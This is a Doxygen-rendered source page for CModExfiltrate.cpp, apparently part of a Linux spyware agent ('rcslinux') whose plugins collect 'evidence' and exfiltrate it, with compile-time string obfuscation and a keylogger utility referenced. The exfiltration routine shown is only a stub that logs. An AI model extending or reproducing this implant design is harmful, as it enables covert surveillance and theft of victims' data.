<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.18"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>rcslinux: plugins/modexfiltrate/CModExfiltrate.cpp Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">rcslinux
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.18 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_38c8d24aef3972a7f87b834274e76e31.html">plugins</a></li><li class="navelem"><a class="el" href="dir_7ea5b80cdedbce2cade7d7b84e70c8df.html">modexfiltrate</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="headertitle">
<div class="title">CModExfiltrate.cpp</div>  </div>
</div><!--header-->
<div class="contents">
<a href="CModExfiltrate_8cpp.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno">    1</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00002"></a><span class="lineno">    2</span>&#160;<span class="comment">// Created by jrf/ht on 26/02/19.</span></div>
<div class="line"><a name="l00003"></a><span class="lineno">    3</span>&#160;<span class="comment">//</span></div>
<div class="line"><a name="l00004"></a><span class="lineno">    4</span>&#160; </div>
<div class="line"><a name="l00005"></a><span class="lineno">    5</span>&#160;<span class="preprocessor">#include &quot;<a class="code" href="CModExfiltrate_8h.html">CModExfiltrate.h</a>&quot;</span></div>
<div class="line"><a name="l00006"></a><span class="lineno">    6</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="bdutils_8h.html">bdutils.h</a>&gt;</span></div>
<div class="line"><a name="l00007"></a><span class="lineno">    7</span>&#160;<span class="preprocessor">#include &lt;<a class="code" href="ICore_8h.html">ICore.h</a>&gt;</span></div>
<div class="line"><a name="l00008"></a><span class="lineno">    8</span>&#160; </div>
<div class="line"><a name="l00009"></a><span class="lineno">    9</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceBdUtils.html">BdUtils</a>;</div>
<div class="line"><a name="l00010"></a><span class="lineno">   10</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentCore.html">AgentCore</a>;</div>
<div class="line"><a name="l00011"></a><span class="lineno">   11</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentPlugin.html">AgentPlugin</a>;</div>
<div class="line"><a name="l00012"></a><span class="lineno">   12</span>&#160;<span class="keyword">using namespace </span><a class="code" href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a>;</div>
<div class="line"><a name="l00013"></a><span class="lineno">   13</span>&#160; </div>
<div class="line"><a name="l00014"></a><span class="lineno">   14</span>&#160;<span class="comment">// the plugin name</span></div>
<div class="line"><a name="l00015"></a><span class="lineno">   15</span>&#160;<span class="preprocessor">#define PLUGIN_NAME &quot;modexfiltrate&quot;</span></div>
<div class="line"><a name="l00016"></a><span class="lineno"><a class="line" href="CModExfiltrate_8cpp.html#a0acf7475326cdcd31d690b72033de33a">   16</a></span>&#160; </div>
<div class="line"><a name="l00020"></a><span class="lineno"><a class="line" href="CModExfiltrate_8cpp.html#a059b25eae0c9691ffc03478bef362549">   20</a></span>&#160;<span class="keyword">extern</span> <span class="stringliteral">&quot;C&quot;</span> <a class="code" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *<a class="code" href="CModExfiltrate_8cpp.html#a059b25eae0c9691ffc03478bef362549">instance</a>() {</div>
<div class="line"><a name="l00021"></a><span class="lineno">   21</span>&#160;    <span class="keywordflow">if</span> (<a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00022"></a><span class="lineno">   22</span>&#160;        <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> = <span class="keyword">new</span> <a class="code" href="classAgentPluginPrivate_1_1CModExfiltrate.html">CModExfiltrate</a>();</div>
<div class="line"><a name="l00023"></a><span class="lineno">   23</span>&#160;    }</div>
<div class="line"><a name="l00024"></a><span class="lineno">   24</span>&#160;    <span class="keywordflow">return</span> <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a>;</div>
<div class="line"><a name="l00025"></a><span class="lineno">   25</span>&#160;}</div>
<div class="line"><a name="l00026"></a><span class="lineno">   26</span>&#160; </div>
<div class="line"><a name="l00027"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModExfiltrate.html#a30138ae7ec1385b16f9720f5a857c16f">   27</a></span>&#160;<span class="keywordtype">int</span> CModExfiltrate::start(<span class="keywordtype">void</span> *params) {</div>
<div class="line"><a name="l00028"></a><span class="lineno">   28</span>&#160;    <span class="keywordflow">if</span> (params == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00029"></a><span class="lineno">   29</span>&#160;        <span class="comment">// modexfiltrate needs the start parameters, it&#39;s an internal plugin only</span></div>
<div class="line"><a name="l00030"></a><span class="lineno">   30</span>&#160;        <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;modexfltrate needs the start parameter!&quot;</span>);</div>
<div class="line"><a name="l00031"></a><span class="lineno">   31</span>&#160;        <span class="keywordflow">return</span> EINVAL;</div>
<div class="line"><a name="l00032"></a><span class="lineno">   32</span>&#160;    }</div>
<div class="line"><a name="l00033"></a><span class="lineno">   33</span>&#160;    <span class="keywordtype">int</span> res = 0;</div>
<div class="line"><a name="l00034"></a><span class="lineno">   34</span>&#160;    CPluginBase::start(params);</div>
<div class="line"><a name="l00035"></a><span class="lineno">   35</span>&#160; </div>
<div class="line"><a name="l00036"></a><span class="lineno">   36</span>&#160;    <span class="comment">// get start parameters</span></div>
<div class="line"><a name="l00037"></a><span class="lineno">   37</span>&#160;    <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a>* pars = (<a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a>*) params;</div>
<div class="line"><a name="l00038"></a><span class="lineno">   38</span>&#160;    <span class="keywordflow">if</span> (pars-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a> == <a class="code" href="group__EVIDENCE__INTERNAL.html#gabc3d9ed56f1b62fac4fdea93d2dd7646">EVIDENCE_EXFILTRATE</a>) {</div>
<div class="line"><a name="l00039"></a><span class="lineno">   39</span>&#160;        <span class="comment">// perform the actual exfiltration</span></div>
<div class="line"><a name="l00040"></a><span class="lineno">   40</span>&#160;        res = exfiltrateSingleInternal(pars-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">evidencePath</a>, (uint8_t *) pars-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">in</a>, pars-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">inSize</a>);</div>
<div class="line"><a name="l00041"></a><span class="lineno">   41</span>&#160;    }</div>
<div class="line"><a name="l00042"></a><span class="lineno">   42</span>&#160; </div>
<div class="line"><a name="l00043"></a><span class="lineno">   43</span>&#160;    <span class="comment">// done</span></div>
<div class="line"><a name="l00044"></a><span class="lineno">   44</span>&#160;    stop(params);</div>
<div class="line"><a name="l00045"></a><span class="lineno">   45</span>&#160; </div>
<div class="line"><a name="l00046"></a><span class="lineno">   46</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00047"></a><span class="lineno">   47</span>&#160;}</div>
<div class="line"><a name="l00048"></a><span class="lineno">   48</span>&#160; </div>
<div class="line"><a name="l00055"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModExfiltrate.html#a3cdd3898da001d29eb18402222e1dd16">   55</a></span>&#160;<span class="keywordtype">int</span> CModExfiltrate::exfiltrateSingleInternal(<span class="keyword">const</span> <span class="keywordtype">char</span> *path, uint8_t *data, <span class="keywordtype">int</span> size) {</div>
<div class="line"><a name="l00056"></a><span class="lineno">   56</span>&#160;    <span class="keywordflow">if</span> (!data || !size || !path) {</div>
<div class="line"><a name="l00057"></a><span class="lineno">   57</span>&#160;        <span class="keywordflow">return</span> EINVAL;</div>
<div class="line"><a name="l00058"></a><span class="lineno">   58</span>&#160;    }</div>
<div class="line"><a name="l00059"></a><span class="lineno">   59</span>&#160;    <span class="keywordtype">int</span> res = 0;</div>
<div class="line"><a name="l00060"></a><span class="lineno">   60</span>&#160; </div>
<div class="line"><a name="l00061"></a><span class="lineno">   61</span>&#160;    <span class="comment">// read configuration</span></div>
<div class="line"><a name="l00062"></a><span class="lineno">   62</span>&#160;    JsonObject&amp; config = ownConfiguration();</div>
<div class="line"><a name="l00063"></a><span class="lineno">   63</span>&#160; </div>
<div class="line"><a name="l00064"></a><span class="lineno">   64</span>&#160;    <span class="comment">// @todo perform the actual exfiltration, possibly trying different endpoints</span></div>
<div class="line"><a name="l00065"></a><span class="lineno">   65</span>&#160;    <a class="code" href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a>(<span class="stringliteral">&quot;exfiltrating: %s, size=%d&quot;</span>, path, size);</div>
<div class="line"><a name="l00066"></a><span class="lineno">   66</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00067"></a><span class="lineno">   67</span>&#160;}</div>
<div class="line"><a name="l00068"></a><span class="lineno">   68</span>&#160; </div>
<div class="line"><a name="l00069"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModExfiltrate.html#aaee7982b8d6a8f18c5856f4d71ac616e">   69</a></span>&#160;<span class="keywordtype">int</span> CModExfiltrate::init(<a class="code" href="classAgentCore_1_1ICore.html">AgentCore::ICore</a> *core, <a class="code" href="structAgentPlugin_1_1__PluginInitStruct.html">PluginInitStruct</a> *params) {</div>
<div class="line"><a name="l00070"></a><span class="lineno">   70</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00071"></a><span class="lineno">   71</span>&#160;    <span class="comment">// set this plugin type</span></div>
<div class="line"><a name="l00072"></a><span class="lineno">   72</span>&#160;    _type = <a class="code" href="group__PLUGINS__INTERNAL.html#ga69cec44b1cd1764894339faa86ebcf0f">PLUGIN_TYPE_EXFILTRATOR</a>;</div>
<div class="line"><a name="l00073"></a><span class="lineno">   73</span>&#160;    CPluginBase::init(core, params);</div>
<div class="line"><a name="l00074"></a><span class="lineno">   74</span>&#160;    <span class="keywordtype">int</span> res = 0;</div>
<div class="line"><a name="l00075"></a><span class="lineno">   75</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00076"></a><span class="lineno">   76</span>&#160;}</div>
<div class="line"><a name="l00077"></a><span class="lineno">   77</span>&#160; </div>
<div class="line"><a name="l00078"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModExfiltrate.html#ae3838b47b2e31ce4eef8e0b8186ed193">   78</a></span>&#160;CModExfiltrate::CModExfiltrate() : <a class="code" href="classAgentPluginPrivate_1_1CPluginBase.html">CPluginBase</a>(<a class="code" href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a>(<a class="code" href="CModExfiltrate_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a>)) {</div>
<div class="line"><a name="l00079"></a><span class="lineno">   79</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00080"></a><span class="lineno">   80</span>&#160; </div>
<div class="line"><a name="l00081"></a><span class="lineno">   81</span>&#160;    <span class="comment">// initialize network support</span></div>
<div class="line"><a name="l00082"></a><span class="lineno">   82</span>&#160;    CHttp::initHttpLib();}</div>
<div class="line"><a name="l00083"></a><span class="lineno">   83</span>&#160; </div>
<div class="line"><a name="l00084"></a><span class="lineno"><a class="line" href="classAgentPluginPrivate_1_1CModExfiltrate.html#adbd46603a00e95320df30a1fd36e0ba3">   84</a></span>&#160;<a class="code" href="classAgentPluginPrivate_1_1CModExfiltrate.html#adbd46603a00e95320df30a1fd36e0ba3">CModExfiltrate::~CModExfiltrate</a>() {</div>
<div class="line"><a name="l00085"></a><span class="lineno">   85</span>&#160;    <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="keyword">nullptr</span>);</div>
<div class="line"><a name="l00086"></a><span class="lineno">   86</span>&#160; </div>
<div class="line"><a name="l00087"></a><span class="lineno">   87</span>&#160;    <span class="comment">// deinitialize network support</span></div>
<div class="line"><a name="l00088"></a><span class="lineno">   88</span>&#160;    CHttp::deinitHttpLib();</div>
<div class="line"><a name="l00089"></a><span class="lineno">   89</span>&#160;}</div>
</div><!-- fragment --></div><!-- contents -->
<div class="ttc" id="anamespaceAgentPlugin_html"><div class="ttname"><a href="namespaceAgentPlugin.html">AgentPlugin</a></div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8h_source.html#l00011">CEvidenceManager.h:11</a></div></div>
<div class="ttc" id="aCPluginBase_8cpp_html_ac294a95d63deba8831a754100349423d"><div class="ttname"><a href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a></div><div class="ttdeci">IPlugin * _instance</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00016">CPluginBase.cpp:16</a></div></div>
<div class="ttc" id="aclassAgentPlugin_1_1IPlugin_html"><div class="ttname"><a href="classAgentPlugin_1_1IPlugin.html">AgentPlugin::IPlugin</a></div><div class="ttdoc">exposes plugins functionality to the core's plugin manager AgentCorePrivate::CPluginManager</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00063">IPlugin.h:63</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga48e7b89694845643759212d026351465"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">AgentCore::_EvidenceStartParams::inSize</a></div><div class="ttdeci">int inSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00026">IEvidence.h:26</a></div></div>
<div class="ttc" id="astructAgentPlugin_1_1__PluginInitStruct_html"><div class="ttname"><a href="structAgentPlugin_1_1__PluginInitStruct.html">AgentPlugin::_PluginInitStruct</a></div><div class="ttdoc">this gets passed through IPlugin::init() when a plugin is initialized</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00029">IPlugin.h:29</a></div></div>
<div class="ttc" id="aCModExfiltrate_8cpp_html_a059b25eae0c9691ffc03478bef362549"><div class="ttname"><a href="CModExfiltrate_8cpp.html#a059b25eae0c9691ffc03478bef362549">instance</a></div><div class="ttdeci">IPlugin * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CModExfiltrate_8cpp_source.html#l00020">CModExfiltrate.cpp:20</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModExfiltrate_html"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModExfiltrate.html">AgentPluginPrivate::CModExfiltrate</a></div><div class="ttdoc">implements default evidence exfiltration</div><div class="ttdef"><b>Definition:</b> <a href="CModExfiltrate_8h_source.html#l00027">CModExfiltrate.h:27</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html"><div class="ttname"><a href="classAgentCore_1_1ICore.html">AgentCore::ICore</a></div><div class="ttdoc">exposes the application (agent) context AgentCorePrivate::CAppContext to the plugins</div><div class="ttdef"><b>Definition:</b> <a href="ICore_8h_source.html#l00032">ICore.h:32</a></div></div>
<div class="ttc" id="agroup__PLUGINS__INTERNAL_html_ga69cec44b1cd1764894339faa86ebcf0f"><div class="ttname"><a href="group__PLUGINS__INTERNAL.html#ga69cec44b1cd1764894339faa86ebcf0f">PLUGIN_TYPE_EXFILTRATOR</a></div><div class="ttdeci">#define PLUGIN_TYPE_EXFILTRATOR</div><div class="ttdoc">a special plugin to exfiltrate evidences</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00048">IPlugin.h:47</a></div></div>
<div class="ttc" id="abdutils_8h_html"><div class="ttname"><a href="bdutils_8h.html">bdutils.h</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gaf7722a418bb9513d53b5f63a1f45b660"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">AgentCore::_EvidenceStartParams::evidencePath</a></div><div class="ttdeci">char * evidencePath</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00029">IEvidence.h:29</a></div></div>
<div class="ttc" id="anamespaceBdUtils_html"><div class="ttname"><a href="namespaceBdUtils.html">BdUtils</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00016">CPluginBase.h:16</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gab3661827a38a2a99bb944c5a873f98b4"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">AgentCore::_EvidenceStartParams::mode</a></div><div class="ttdeci">int mode</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00024">IEvidence.h:24</a></div></div>
<div class="ttc" id="aCLog_8h_html_a6116789398e26a1c2bc635117a2e4960"><div class="ttname"><a href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a></div><div class="ttdeci">#define DBGLOGE(...)</div><div class="ttdoc">prints ERROR debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00063">CLog.h:62</a></div></div>
<div class="ttc" id="aCLog_8h_html_a2b5d27a6100113b1a09dce32f08b6f07"><div class="ttname"><a href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a></div><div class="ttdeci">#define DBGLOGI(...)</div><div class="ttdoc">set to enable debug messages on release builds</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00055">CLog.h:54</a></div></div>
<div class="ttc" id="anamespaceAgentCore_html"><div class="ttname"><a href="namespaceAgentCore.html">AgentCore</a></div><div class="ttdef"><b>Definition:</b> <a href="CKeylogUtils_8h_source.html#l00012">CKeylogUtils.h:12</a></div></div>
<div class="ttc" id="aICore_8h_html"><div class="ttname"><a href="ICore_8h.html">ICore.h</a></div></div>
<div class="ttc" id="aobfuscate_8h_html_aeb960253580086e334d4f65300c10256"><div class="ttname"><a href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a></div><div class="ttdeci">#define vxENCRYPT(Str)</div><div class="ttdoc">compile-time encrypt string (release build only)</div><div class="ttdef"><b>Definition:</b> <a href="obfuscate_8h_source.html#l00097">obfuscate.h:96</a></div></div>
<div class="ttc" id="aCLog_8h_html_a989e37701588731748694b31a0b424db"><div class="ttname"><a href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a></div><div class="ttdeci">#define DBGLOGV(...)</div><div class="ttdoc">prints VERBOSE debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00067">CLog.h:66</a></div></div>
<div class="ttc" id="aCModExfiltrate_8h_html"><div class="ttname"><a href="CModExfiltrate_8h.html">CModExfiltrate.h</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CPluginBase_html"><div class="ttname"><a href="classAgentPluginPrivate_1_1CPluginBase.html">AgentPluginPrivate::CPluginBase</a></div><div class="ttdoc">base class for all plugins, implements AgentPlugin::IPlugin</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00029">CPluginBase.h:29</a></div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModExfiltrate_html_adbd46603a00e95320df30a1fd36e0ba3"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModExfiltrate.html#adbd46603a00e95320df30a1fd36e0ba3">AgentPluginPrivate::CModExfiltrate::~CModExfiltrate</a></div><div class="ttdeci">~CModExfiltrate() final</div><div class="ttdef"><b>Definition:</b> <a href="CModExfiltrate_8cpp_source.html#l00084">CModExfiltrate.cpp:84</a></div></div>
<div class="ttc" id="astructAgentCore_1_1__EvidenceStartParams_html"><div class="ttname"><a href="structAgentCore_1_1__EvidenceStartParams.html">AgentCore::_EvidenceStartParams</a></div><div class="ttdoc">evidence and exfiltrator plugins AgentPlugin::IPlugin::start() will be called with a pointer to this ...</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00023">IEvidence.h:23</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga20360a0574745e71136d9fef2da48f93"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">AgentCore::_EvidenceStartParams::in</a></div><div class="ttdeci">void * in</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00025">IEvidence.h:25</a></div></div>
<div class="ttc" id="aCModExfiltrate_8cpp_html_a0acf7475326cdcd31d690b72033de33a"><div class="ttname"><a href="CModExfiltrate_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a></div><div class="ttdeci">#define PLUGIN_NAME</div><div class="ttdef"><b>Definition:</b> <a href="CModExfiltrate_8cpp_source.html#l00016">CModExfiltrate.cpp:15</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gabc3d9ed56f1b62fac4fdea93d2dd7646"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gabc3d9ed56f1b62fac4fdea93d2dd7646">EVIDENCE_EXFILTRATE</a></div><div class="ttdeci">#define EVIDENCE_EXFILTRATE</div><div class="ttdoc">to call the exfiltrator plugin to exfiltrate an evidence</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00062">IEvidence.h:61</a></div></div>
<div class="ttc" id="anamespaceAgentPluginPrivate_html"><div class="ttname"><a href="namespaceAgentPluginPrivate.html">AgentPluginPrivate</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00023">CPluginBase.h:23</a></div></div>
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.18
</small></address>
</body>
</html>
